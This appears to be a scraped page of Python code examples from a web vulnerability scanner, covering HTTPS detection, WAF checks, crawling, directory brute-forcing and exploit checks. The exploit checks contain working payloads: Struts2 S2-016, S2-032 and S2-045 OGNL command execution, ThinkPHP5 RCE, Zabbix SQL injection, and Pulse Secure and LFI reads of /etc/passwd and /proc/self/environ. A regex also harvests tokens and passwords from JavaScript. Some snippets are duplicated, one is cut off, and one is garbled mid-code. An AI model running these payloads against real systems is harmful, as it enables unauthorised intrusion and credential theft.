Exemplo n.º 1
0
def verify_https(url):
    # 验证域名是http或者https的
    # 如果域名是302跳转 则获取跳转后的地址
    req = Requests()
    url2 = parse.urlparse(url)
    if url2.netloc:
        url = url2.netloc
    elif url2.path:
        url = url2.path
    # noinspection PyBroadException
    try:
        r = req.get('https://' + url)
        getattr(r, 'status_code')
        if r.status_code == 302 or r.status_code == 301:
            r = req.get('https://' + 'www.' + url)
            if r.status_code == 200:
                return 'https://' + 'www.' + url
        return 'https://' + url
    except Exception as e:
        # noinspection PyBroadException
        try:
            req.get('http://' + url)
            return 'http://' + url
        except Exception:
            pass
Exemplo n.º 2
0
def verify_https(url):
    # 验证域名是http或者https的
    # 如果域名是302跳转 则获取跳转后的地址
    req = Requests()
    # noinspection PyBroadException
    if '://' in url:
        try:
            r = req.get(url)
            return url
        except Exception as e:
            pass
    host = parse_host(url)
    url2 = parse.urlparse(url)
    if url2.netloc:
        url = url2.netloc
    elif url2.path:
        url = url2.path
    # noinspection PyBroadException
    try:
        r = req.get('https://' + url)
        getattr(r, 'status_code')
        console('Verify', host, 'https://' + url + '\n')
        return 'https://' + url
    except AttributeError:
        # noinspection PyBroadException
        try:
            req.get('http://' + url)
            console('Verify', host, 'http://' + url + '\n')
            return 'http://' + url
        except Exception:
            pass
    except Exception as e:
        logging.exception(e)
Exemplo n.º 3
0
def checkwaf(url):
    try:
        req = Requests()
        r = req.get(url)
        result = verify(r.headers, r.text[:10000])
        if result == 'NoWAF':
            for i in payload:
                r = req.get(url + i)
                result = verify(r.headers, r.text[:10000])
        return result
    except:
        return 'NoWAF'
Exemplo n.º 4
0
def verify_https(url):
    req = Requests()
    url2 = parse.urlparse(url)
    if url2.netloc:
        url = url2.netloc
    elif url2.path:
        url = url2.path
    try:
        req.get('https://' + url)
        return 'https://' + url
    except Exception as e:
        try:
            req.get('http://' + url)
            return 'http://' + url
        except:
            pass
Exemplo n.º 5
0
class JsLeaks():
    def __init__(self):
        self.result = []
        self.req = Requests()

    def pool(self, urls):
        try:
            with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor:
                result = {executor.submit(self.get_js, i): i for i in urls}
                for future in concurrent.futures.as_completed(result, timeout=3):
                    future.result()
        except (EOFError, concurrent.futures._base.TimeoutError):
            pass
        except Exception as e:
            logging.exception(e)

        return self.result

    def verify(self, text):
        result = True
        for i in text:
            if not re.search(r'^0\d\.\d+\.\d+\.\d+|google|png$|gif$|jpg$|\b\d+\.\d+\.0\.0', i):
                result = False
                break
        return result

    def get_js(self, url):
        r = self.req.get(url)
        regex = (
            # 匹配url
            r'\b(?:http:|https:)(?:[\w/\.]+)?(?:[a-zA-Z0-9_\-\.]{1,})\.(?:php|asp|ashx|jspx|aspx|jsp|json|action|html|txt|xml|do|js)\b',
            r'([a-zA-Z0-9_\-]{1,}\.(?:php|asp|aspx|jsp|json|action|html|js|txt|xml)(?:\?[^\"|\']{0,}|))',
            # 匹配邮箱
            r'[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(?:\.[a-zA-Z0-9_-]+)+',
            # 匹配token或者密码泄露
            # 例如token = xxxxxxxx, 或者"apikey" : "xssss"
            r'\b(?:secret|secret_key|token|secret_token|auth_token|access_token|username|password|aws_access_key_id|aws_secret_access_key|secretkey|authtoken|accesstoken|access-token|authkey|client_secret|bucket|extr|HEROKU_API_KEY|SF_USERNAME|PT_TOKEN|id_dsa|clientsecret|client-secret|encryption-key|pass|encryption_key|encryptionkey|secretkey|secret-key|bearer|JEKYLL_GITHUB_TOKEN|HOMEBREW_GITHUB_API_TOKEN|api_key|api_secret_key|api-key|private_key|client_key|client_id|sshkey|ssh_key|ssh-key|privatekey|DB_USERNAME|oauth_token|irc_pass|dbpasswd|xoxa-2|xoxrprivate-key|private_key|consumer_key|consumer_secret|access_token_secret|SLACK_BOT_TOKEN|slack_api_token|api_token|ConsumerKey|ConsumerSecret|SESSION_TOKEN|session_key|session_secret|slack_token|slack_secret_token|bot_access_token|passwd|api|eid|sid|qid|api_key|apikey|userid|user_id|user-id|uid|private|BDUSS|stoken|imei|imsi|nickname|appid|uname)["\s]*(?::|=|=:|=>)["\s]*[a-z0-9A-Z]{8,64}',
            # 匹配
            r'(?:[^a-fA-F\d]|\b)(?:[a-fA-F\d]{32})(?:[^a-fA-F\d]|\b)',
            # 匹配 "/task/router" 这种路径
            r'"(/\w{3,}/\w{3,})"',
            # 匹配IP地址
            r'\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b',
            # 匹配云泄露
            r'[\w]+\.cloudfront\.net',
            r'[\w\-.]+\.appspot\.com',
            r'[\w\-.]*s3[\w\-.]*\.?amazonaws\.com\/?[\w\-.]*',
            r'([\w\-.]*\.?digitaloceanspaces\.com\/?[\w\-.]*)',
            r'(storage\.cloud\.google\.com\/[\w\-.]+)',
            r'([\w\-.]*\.?storage.googleapis.com\/?[\w\-.]*)',
            # 匹配手机号
            r'(?:139|138|137|136|135|134|147|150|151|152|157|158|159|178|182|183|184|187|188|198|130|131|132|155|156|166|185|186|145|175|176|133|153|177|173|180|181|189|199|170|171)[0-9]{8}'
            # 匹配域名
            r'((?:[a-zA-Z0-9](?:[a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?\.)+(?:biz|cc|club|cn|com|co|edu|fun|group|info|ink|kim|link|live|ltd|mobi|net|online|org|pro|pub|red|ren|shop|site|store|tech|top|tv|vip|wang|wiki|work|xin|xyz|me))'
        )
        for _ in regex:
            text = re.findall(_, r.text[:100000], re.M | re.I)
            if text is not None and self.verify(text):
                text = list(map(lambda x: url + ' Leaks: ' + x, text))
                self.result.extend(text)
Exemplo n.º 6
0
def get_info(url):
    try:
        req = Requests()
        url = url + '/solr/'
        r = req.get(url)
        if r.status_code is 200 and 'Solr Admin' in r.text and 'Dashboard' in r.text:
            return 'Apache Solr Admin leask: ' + url
    except Exception:
        pass
Exemplo n.º 7
0
def check(url, ip, ports, apps):
    req = Requests()
    if verify(vuln, ports, apps):
        payload = r"/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17"
        try:
            r = req.get(url + payload)
            if ('ed733b8d10be225eceba344d533586' in r.text) or ('SQL error ' in r.text):
                return 'CVE-2016-10134 zabbix sqli:' + url
        except Exception as e:
            pass
Exemplo n.º 8
0
def check(url, ip, ports, apps):
    req = Requests()
    if verify(vuln, ports, apps):
        payload = r"/index.php/?s=/index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
        try:
            r = req.get(url + payload)
            if ('PHP Version' in r.text) or ('PHP Extension Build' in r.text):
                return 'thinkphp5_rce_1 | ' + url
        except Exception as e:
            pass
def check(url, ip, ports, apps):
    req = Requests()
    if verify(vuln, ports, apps):
        payload = r"/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/"
        try:
            r = req.get(url + payload)
            if 'root:x:0:0:root' in r.text:
                return 'CVE-2019-11510 Pulse Connect Secure File | ' + url
        except Exception as e:
            pass
Exemplo n.º 10
0
def check(url, ip, ports, apps):
    req = Requests()
    if verify(vuln, ports, apps):
        try:
            url = url + '/solr/'
            r = req.get(url)
            if r.status_code is 200 and 'Solr Admin' in r.content and 'Dashboard' in r.content:
                return 'Apache Solr Admin leask'
        except Exception:
            pass
Exemplo n.º 11
0
def get_info(url):
    try:
        req = Requests()
        for i in path:
            r = req.get(url + i)
            if r.status_code == 200:
                if '<title>phpinfo()' in r.text or 'php_version' in r.text:
                    return 'phpinfo leaks: ' + url + i
    except:
        pass
Exemplo n.º 12
0
def get_info(url):
    try:
        req = Requests()
        for i in path:
            r = req.get(url + i)
            if r.status_code == 200 and '<html>' not in r.text:
                if not re.search(r'{"\w+":', r.text):
                    if verify(r.text):
                        return 'leaks : ' + url + i
    except:
        pass
Exemplo n.º 13
0
def check(url, ip, ports, apps):
    req = Requests()
    if verify(vuln, ports, apps):
        payload = "//www.example.com"
        try:
            r = req.get(url + payload)
            if r.is_redirect and 'www.example.com' in r.headers.get(
                    'Location'):
                return 'Django < 2.0.8 任意URL跳转漏洞'
        except Exception as e:
            pass
Exemplo n.º 14
0
def get_info(url):
    try:
        req = Requests()
        for i in path:
            r = req.get(url + i)
            if r.status_code == 200 and '<html' not in r.text:
                if not re.search(r'{"\w+":|<head>|<form\s|<div\s|<input\s|<html|</a>|Active connections', r.text):
                    if verify(r.text):
                        return 'leaks : ' + url + i
    except:
        pass
Exemplo n.º 15
0
def checkwaf(url):
    try:
        req = Requests()
        r = req.get(url)
        result = verify(r.headers, r.text[:10000])
        if result == 'NoWAF':
            for i in payload:
                r = req.get(url + i)
                result = verify(r.headers, r.text[:10000])
                if result != 'NoWAF':
                    return result
    except UnboundLocalError:
        pass
    except Exception as e:
        logging.exception(e)
    host = parse_host(url)

    if not iscdn(host):
        return 'CDN IP'

    return 'NoWAF'
Exemplo n.º 16
0
class SqlLfi():
    def __init__(self):
        self.result = []
        self.req = Requests()
    
    def sqli(self, qurl):
        payload = {
            "'", "%2527", "')", " AnD 7738=8291"
        }
        LFI_payload = {'../../../../etc/passwd|root:x', '../../../../etc/group|root:x', 'random.php|Failed opening',
                       'file://c:/windows/win.ini|drivers', '/proc/self/environ|USER='******'{} SQLi:{}'.format(dbms, qurl)
                        self.result.append(result)
                        raise Getoutofloop
            for i in LFI_payload:
                url = ''
                lfi, pattern = i.split('|')
                if re.search(r'=\w+\.\w{3}$', qurl):
                    url = re.sub(r'\w+\.\w{3}$', lfi, qurl)
                elif re.search('=\w+', qurl):
                    url = re.sub(r'\w+$', lfi, qurl)
                r = self.req.get(url)
                if re.search(pattern, r.text, re.S):
                    self.result.append('LFI: {}'.format(url))
                    break
        except:
            pass
    
    def pool(self, urls):
        host = dedup_url(urls)
        with concurrent.futures.ThreadPoolExecutor(
            max_workers=30) as executor:
            executor.map(self.sqli, host)
        return self.result
Exemplo n.º 17
0
def robots(url):
    result = ''
    try:
        req = Requests()
        r = req.get(url + '/robots.txt')
        if r.status_code == 200 and '<html' not in r.text:
            result = re.findall(r"/[\w\?\.=/]+/?", r.text)
        if result:
            return list(set(result))
    except (UnboundLocalError, AttributeError):
        pass
    except Exception as e:
        logging.exception(e)
Exemplo n.º 18
0
def checkwaf(url):
    result = 'NoWAF'
    host = parse_host(url)

    if not iscdn(host):
        return 'CDN IP'

    try:
        req = Requests()
        r = req.get(url)
        result = verify(r.headers, r.text)
        if result == 'NoWAF':
            for i in payload:
                r = req.get(url + i)
                result = verify(r.headers, r.text)
                if result != 'NoWAF':
                    return result
        else:
            return result
    except (UnboundLocalError, AttributeError):
        pass
    except Exception as e:
        logging.exception(e)
Exemplo n.º 19
0
def get_info(url):
    try:
        req = Requests()
        for i in path:
            r = req.get(url + i)
            if r.status_code == 200:
                if re.search(
                        r'admin|login|manager|登陆|管理|后台|type="password"|入口|admin_passwd',
                        r.text, re.S):
                    if verify(r.text):
                        return 'Admin_Page : ' + url + i
            elif r.status_code == 403:
                return 'May be the login page : ' + url + i

    except:
        pass
Exemplo n.º 20
0
def ipinfo(host):
    out = []
    if not re.search(r'\d+\.\d+\.\d+\.\d+', host):
        req = Requests()
        try:
            r = req.get(
                'https://viewdns.info/iphistory/?domain={}'.format(host))
            result = re.findall(
                r'(?<=<tr><td>)\d+\.\d+\.\d+\.\d+(?=</td><td>)', r.text,
                re.S | re.I)
            if result:
                for i in result:
                    if iscdn(i):
                        out.append(i)
        except:
            pass

    return out
Exemplo n.º 21
0

        
Exemplo n.º 22
0
def web_info(url):
    host = parse_host(url)
    ipaddr = parse_ip(host)
    url = url.strip('/')
    address = geoip(ipaddr)
    wafresult = checkwaf(url)
    req = Requests()
    # noinspection PyBroadException
    try:
        r = req.get(url)
        coding = chardet.detect(r.content).get('encoding')
        r.encoding = coding
        webinfo = WebPage(r.url, r.text, r.headers).info()
    except Exception as e:
        logging.exception(e)
        webinfo = {}
    if webinfo:
        console('Webinfo', host, 'title: {}\n'.format(webinfo.get('title')))
        console('Webinfo', host,
                'Fingerprint: {}\n'.format(webinfo.get('apps')))
        console('Webinfo', host, 'Server: {}\n'.format(webinfo.get('server')))
        console('Webinfo', host, 'WAF: {}\n'.format(wafresult))
    else:
        webinfo = {}
        wafresult = 'None'
    if iscdn(host):
        osname = osdetect(host)
    else:
        osname = None

    data = {
        host: {
            'WAF': wafresult,
            'Ipaddr': ipaddr,
            'Address': address,
            'Webinfo': webinfo,
            'OS': osname,
        }
    }

    return data, webinfo.get('apps'), webinfo.get('title')
Exemplo n.º 23
0
def web_info(url):
    host = parse_host(url)
    ipaddr = parse_ip(host)
    url = url.strip('/')
    address = geoip(ipaddr)
    wafresult = checkwaf(url)
    req = Requests()
    try:
        r = req.get(url)
        coding = chardet.detect(r.content).get('encoding')
        r.encoding = coding
        webinfo = WebPage(r.url, r.text, r.headers).info()
    except Exception as e:
        webinfo = {}
    if webinfo:
        console('Webinfo', host, 'Title: {}\n'.format(webinfo.get('title')))
        console('Webinfo', host, 'Fingerprint: {}\n'.format(webinfo.get('apps')))
        console('Webinfo', host, 'Server: {}\n'.format(webinfo.get('server')))
        console('Webinfo', host, 'WAF: {}\n'.format(wafresult))
    else:
        webinfo = {}
        wafresult = 'None'
    if iscdn(host):
        osname = osdetect(host)
    else:
        osname = None
    pdns = virustotal(host)
    reverseip = reverse_domain(host)
    webinfo.update({"pdns": pdns})
    webinfo.update({"reverseip": reverseip})
    data = {
        host: {
            'WAF': wafresult,
            'Ipaddr': ipaddr,
            'Address': address,
            'Webinfo': webinfo,
            'OS': osname,
        }
    }
    return data, webinfo.get('apps')
Exemplo n.º 24
0
class crawl():
    def __init__(self, host):
        self.links = []
        self.urls = []
        self.js = []
        self.host = host
        self.result = []
        self.req = Requests()

    def jsparse(self, r):
        html = etree.HTML(r.text)
        result = html.xpath('//script/@src')
        for i in result:
            if not re.search(
                    'jquery|bootstrap|adsbygoogle|javascript|#|vue|react|51.la',
                    i):
                if '://' not in i:
                    i = self.host + i
                self.js.append(i)

    def extr(self, body):
        email = re.search(
            r'[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(?:\.[a-zA-Z0-9_-]+)+',
            body).group()
        if email:
            self.result.append('Email Leaks: {}'.format(email))
        phone = re.search(
            r'(?:139|138|137|136|135|134|147|150|151|152|157|158|159|178|182|183|184|187|188|198|130|131|132|155|156|166|185|186|145|175|176|133|153|177|173|180|181|189|199|170|171)[0-9]{8}',
            body).group()
        if phone:
            self.result.append('Phone Leaks: {}'.format(phone))

    def parse_html(self, host):
        try:
            exts = ['asp', 'php', 'jsp', 'do', 'aspx', 'action', 'do', 'html']
            r = self.req.get(host)
            self.jsparse(r)
            self.extr(r.text)
            tmp = html.document_fromstring(r.text)
            tmp.make_links_absolute(self.host)
            links = tmp.iterlinks()
            for i in links:
                i = i[2]
                ext = parse.urlparse(i)[2].split('.')[-1]
                if ext in exts:
                    # 带参数的直接加入列表,不带参数的需要二次访问
                    if re.search('=', i) or re.search('/\?\w+=\w+', i):
                        self.links.append(i)
                    else:
                        self.urls.append(i)
        except Exception as e:
            pass
        return list(set(self.urls))

    def pool(self):
        result = self.parse_html(self.host)
        with concurrent.futures.ThreadPoolExecutor(max_workers=30) as executor:
            executor.map(self.parse_html, result)
        jslink = JsLeaks().pool(self.js)
        sql = SqlLfi().pool(self.links)
        self.result.extend(jslink)
        self.result.extend(sql)
        return self.result
Exemplo n.º 25
0
class crawl():
    def __init__(self, host):
        self.links = []
        self.urls = []
        self.js = []
        self.domain = ''
        self.host = host
        self.result = []
        self.req = Requests()

    def jsparse(self, r):
        try:
            html = etree.HTML(r.text)
            result = html.xpath('//script/@src')
            for i in result:
                if not re.search(
                        r'jquery|bootstrap|adsbygoogle|javascript|#|vue|react|51.la/=',
                        i):
                    if '://' not in i:
                        i = re.sub(r'^/|^\.\./', '', i)
                        i = self.host + '/' + i
                    self.js.append(i)
        except (AttributeError, AttributeError, ValueError):
            pass
        except Exception as e:
            logging.exception(e)

    def dedup_url(self, urls):
        urls = list(set(urls))
        result = []
        okurl = []
        for i in urls:
            urlparse = parse.urlparse(i)
            path = urlparse.path
            if path and path.split('/')[-2]:
                key = path.split('/')[-2]
                if key not in result:
                    result.append(key)
                    okurl.append(i)
            else:
                okurl.append(i)
        return okurl

    def extr(self, url, body):
        email = re.findall(
            r'\b[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(?:\.[a-zA-Z0-9_-]+)+', body)
        if email:
            self.result.extend(
                list(map(lambda x: 'URL: ' + url + '  Email: ' + x, email)))
        phone = re.findall(
            r'\b(?:139|138|137|136|135|134|147|150|151|152|157|158|159|178|182|183|184|187|188|198|130|131|132|155|156|166|185|186|145|175|176|133|153|177|173|180|181|189|199|170|171)[0-9]{8}\b',
            body)
        if phone:
            self.result.extend(
                list(map(lambda x: 'URL: ' + url + '  Phone: ' + x, phone)))
        ipaddr = re.findall(
            r'(?<=<!--).*((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)).*(?=-->)',
            body)
        if ipaddr:
            self.result.extend(list(map(lambda x: 'IP: ' + x, ipaddr)))
        links = re.findall(
            r'(?<=<!--).*((?:http|https):[\w\./\?=&]+)".*(?=-->)', body)
        if links:
            self.result.extend(list(map(lambda x: 'Links: ' + x, links)))
        links2 = re.findall(r'(?<=<!--).*a\shref="([\w\.\?=\&/]+)".*(?=-->)',
                            body)
        if links2:
            self.result.extend(list(map(lambda x: 'Links: ' + x, links2)))

    def parse_html(self, host):
        try:
            r = self.req.get(host)
            self.jsparse(r)
            self.extr(r.url, r.text)
            urlparse = parse.urlparse(host)
            domain = urlparse.netloc
            if not self.domain:
                self.domain = domain
            html = etree.HTML(r.text)
            result = html.xpath('//a/@href')
            for link in result:
                if not re.search('#|mail*|^/$|javascript', link):
                    if 'http' not in link:
                        if urlparse.netloc:
                            link = urlparse.scheme + '://' + urlparse.netloc + '/' + link
                        else:
                            link = 'http://' + host + '/' + link
                    if domain in link:
                        # 带参数的直接加入列表,不带参数的需要二次访问
                        if re.search('=', link) or re.search(
                                r'/\?\w+=\w+', link):
                            self.links.append(link)
                        else:
                            self.urls.append(link)
        except (UnboundLocalError, AttributeError):
            pass
        except Exception as e:
            logging.exception(e)
        self.urls = self.dedup_url(self.urls)
        return list(set(self.urls))

    def pool(self):
        result = self.parse_html(self.host)
        with concurrent.futures.ThreadPoolExecutor(max_workers=30) as executor:
            executor.map(self.parse_html, result)
        jslink = JsLeaks().pool(self.js)
        self.result.extend(jslink)
        self.links = dedup_link(self.links)
        self.links = list(map(lambda x: 'Dynamic: ' + x, self.links))
        self.result.extend(self.links)
        self.result = list(set(self.result))
        for i in self.result:
            console('Crawl', self.host, i + '\n')
        Sqldb('result').get_crawl(self.domain, self.result)
Exemplo n.º 26
0
class DirScan():
    def __init__(self, dbname, apps, host):
        self.notstr = ''
        self.apps = apps
        self.notlen = ''
        self.goto = ''
        self.host = host
        self.title = ''
        self.dbname = dbname
        self.outjson = []

        self.req = Requests()

    def get_urls(self, domain):
        wordlist = []
        robot = robots(domain)
        domain = domain.replace('http://', '').replace('https://',
                                                       '').rstrip('/')
        domain2 = re.sub(r'\.', '_', domain)
        domain3 = domain.strip('www.')
        ext = verify_ext(self.apps)
        ext = list(map(lambda x: '.' + x, ext))
        path = []
        for txt in glob.glob(r'data/path/*.txt'):
            with open(txt, 'r', encoding='utf-8') as f:
                for i in f.readlines():
                    path.append(i.strip())
        leaks = Cartesian()
        leaks.add_data([
            '/www',
            '/1',
            '/2016',
            '/2017',
            '/2018',
            '/2019',
            '/wwwroot',
            '/backup',
            '/index',
            '/web',
            '/test',
            '/tmp',
            '/default',
            '/temp',
            '/website',
            '/upload',
            '/bin',
            '/bbs',
            '/www1',
            '/www2',
            '/log',
            '/extra',
            '/file',
            '/qq',
            '/up',
            '/config',
            '/' + domain,
            '/userlist',
            '/dev',
            '/a',
            '/123',
            '/sysadmin',
            '/localhost',
            '/111',
            '/access',
            '/old',
            '/i',
            '/vip',
            '/index.php',
            '/global',
            '/key',
            '/webroot',
            '/out',
            '/server',
        ])
        leaks.add_data([
            '.tar.gz', '.zip', '.rar', '.sql', '.7z', '.bak', '.tar', '.txt',
            '.tgz', '.swp', '~', '.old', '.tar.bz2', '.data', '.csv'
        ])
        path.extend(leaks.build())
        index = Cartesian()
        index.add_data([
            '/1', '/l', '/info', '/index', '/admin', '/login', '/qq', '/q',
            '/search', '/install', '/default', '/cmd', '/upload', '/test',
            '/manage', '/loading', '/left', '/zzzz', '/welcome', '/ma', '/66'
        ])
        index.add_data(ext)
        path.extend(index.build())
        path.extend(wordlist)
        if robot:
            path.extend(robot)
        return list(set(path))

    def _verify(self, url, code, contype, length, goto, text, title):
        # 验证404页面
        try:
            result = True
            if code in BLOCK_CODE:
                result = False
            if contype in BLOCK_CONTYPE:
                result = False
            if length == self.notlen:
                result = False
            # 调转等于404页面的调转时
            if goto == self.goto:
                result = False
            # url在跳转路径中
            if (url in goto) or (goto in url):
                result = False
            if url.strip('/') == self.goto or url.strip('/') == goto:
                result = False
            for i in PAGE_404:
                if i in text:
                    result = False
                    break
            if title == self.title and title != 'None':
                result = False
            # 有些302跳转会在location里出现error或者404等关键字
            if re.search(r'forbidden|error|404', goto):
                result = False
            # 文件内容类型对不上的情况
            if re.search(
                    r'\.bak$|\.zip$|\.rar$|\.7z$|\.old$|\.htaccess$|\.csv$|\.txt$|\.sql$|\.tar$|\.tar.gz$',
                    url) and contype == 'html':
                result = False
            return result
        except:
            return False

    def parse_html(self, text):
        result = []
        soup = BeautifulSoup(text, 'html.parser')
        for i in soup.find_all(['a', 'img', 'script']):
            if i.get('src'):
                result.append(i.get('src'))
            if i.get('href'):
                result.append(i.get('href'))
        return result

    def check404(self, url):
        # 访问一个随机的页面记录404页面的长度与内容
        key = str(random.random() * 100)
        random_url = base64.b64encode(key.encode('utf-8'))
        url = url + '/' + random_url.decode('utf-8') + '.html'
        try:
            self.notstr = '404page'
            r = self.req.get(url)
            if r.status_code == '200':
                coding = chardet.detect(r.content[:10000]).get('encoding')
                if coding:
                    text = r.content[:20000].decode(coding)
                    self.notstr = self.parse_html(text)
            self.notlen = r.headers.get('Content-Length')
            if not self.notlen:
                self.notlen = len(r.content)
            if r.is_redirect:
                self.goto = r.headers['Location']
        except (requests.exceptions.ConnectTimeout,
                requests.exceptions.ReadTimeout, requests.exceptions.Timeout,
                requests.exceptions.SSLError,
                requests.exceptions.ConnectionError, ssl.SSLError,
                AttributeError, ConnectionRefusedError, socket.timeout,
                urllib3.exceptions.ReadTimeoutError,
                urllib3.exceptions.ProtocolError, OpenSSL.SSL.WantReadError):
            pass

        except UnboundLocalError:
            pass

        except Exception as e:
            logging.exception(e)

    def scan(self, host):
        try:
            r = self.req.scan(host)
            if r.is_redirect:
                goto = r.headers.get('Location')
            else:
                goto = 'test'
            if r.headers.get('Content-Type'):
                contype = re.sub(r'\w+/', '',
                                 str(r.headers.get('Content-Type')))
                contype = re.sub(r';.*', '', contype)
            else:
                contype = 'None'
            rsp_len = r.headers.get('Content-Length')
            # 判断是不是网页或者文本,如果是其他文件coding将置为空
            ishtml = False
            if contype == 'html':
                ishtml = True
                content = r.raw.read()
            else:
                content = r.raw.read(25000)

            if ishtml:
                coding = chardet.detect(content).get('encoding')
                if coding:
                    text = content.decode(coding)
                    title = re.search('(?<=<title>).*(?=</title>)', text)
                else:
                    text = 'Other'
                    title = None

            else:
                text = 'Other'
                title = None
            if not rsp_len:
                rsp_len = len(content)

            urlresult = parse.urlparse(host)
            if self._verify(urlresult.path, r.status_code, contype, rsp_len,
                            goto, text, title):
                result = 0
                if ishtml:
                    pagemd5 = self.parse_html(text)
                    if pagemd5 == self.notstr:
                        result = 1
                if result < 0.5:
                    if title is None:
                        title = 'None'
                    else:
                        title = title.group()
                    title = re.sub(r'\n|\t', '', title)
                    console('URLS', urlresult.netloc, urlresult.path + '\n')
                    data = {
                        urlresult.netloc: {
                            "rsp_code": r.status_code,
                            "rsp_len": rsp_len,
                            "title": title,
                            "contype": contype,
                            "url": urlresult.path
                        }
                    }
                    self.outjson.append(data)
                    r.close()

        except (requests.exceptions.ConnectTimeout,
                requests.exceptions.ReadTimeout, requests.exceptions.Timeout,
                requests.exceptions.SSLError,
                requests.exceptions.ConnectionError, ssl.SSLError,
                AttributeError, ConnectionRefusedError, socket.timeout,
                urllib3.exceptions.ReadTimeoutError,
                urllib3.exceptions.ProtocolError, OpenSSL.SSL.WantReadError):
            pass

        except (UnboundLocalError, AttributeError):
            pass

        except Exception as e:
            logging.exception(host)
            logging.exception(e)

        try:
            r.close()
        except:
            pass
        return 'OK'

    def save(self, urls):
        Sqldb(self.dbname).get_urls(urls)

    def run(self, task):
        try:
            with concurrent.futures.ThreadPoolExecutor(
                    max_workers=THREADS) as executor:
                futures = [executor.submit(self.scan, i) for i in task]
                for future in concurrent.futures.as_completed(futures,
                                                              timeout=3):
                    future.result()

        except (EOFError, concurrent.futures._base.TimeoutError):
            pass

    # 创建启动任务
    def pool(self):
        host = self.host.strip('/')
        self.check404(host)
        task = []
        urls = self.get_urls(host)
        random.shuffle(urls)
        for url in urls:
            task.append(host + url)
        self.run(task)
        # 保存结果
        self.save(self.outjson)
Exemplo n.º 27
0
class struts():
    def __init__(self, ip):
        self.url = ip
        self.result = []
        self.random = random.randint(100000000, 200000000)
        self.win = 'set /a ' + str(self.random)
        self.linux = 'echo ' + str(self.random)
        self.timeout = 3
        self.req = Requests()

    def st016(self):
        payload = r"/default.action?redirect:%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23f.setAccessible%28true%29%2C%23f.set%28%23_memberAccess%2Ctrue%29%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27" + self.linux + "%27%29.getInputStream%28%29%29%7D"
        try:
            r = self.req.get(self.url + payload)
            if str(self.random) in r.headers['Location'] and len(
                    r.headers['Location']) < 15:
                self.result.append('Apache S2-016 Vulnerability: ' + self.url)
        except:
            pass

    def st032(self):
        payload = r"/?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd={}&pp=\\A&ppp=%20&encoding=UTF-8".format(
            self.linux)
        try:
            r = self.req.get(self.url + payload)
            if str(self.random) in r.text and len(r.text) < 11:
                self.result.append('Apache S2-032 Vulnerability: ' + self.url)
        except:
            pass

    def st045(self):
        try:
            cmd = self.linux
            header = dict()
            header[
                "User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
            header[
                "Content-Type"] = "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#iswin?(#cmd='" + cmd + "'):(#cmd='" + cmd + "')).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
            r = request.Request(self.url, headers=header)
            text = request.urlopen(r).read()
        except http.client.IncompleteRead as e:
            text = e.partial
        except:
            pass
        if 'text' in locals().keys():
            self.random = str(self.random)
            if self.random.encode('utf-8') in text and len(text) < 15:
                self.result.append('Apache S2-045 Vulnerability: ' + self.url)

    def st048(self):
        cmd = self.linux
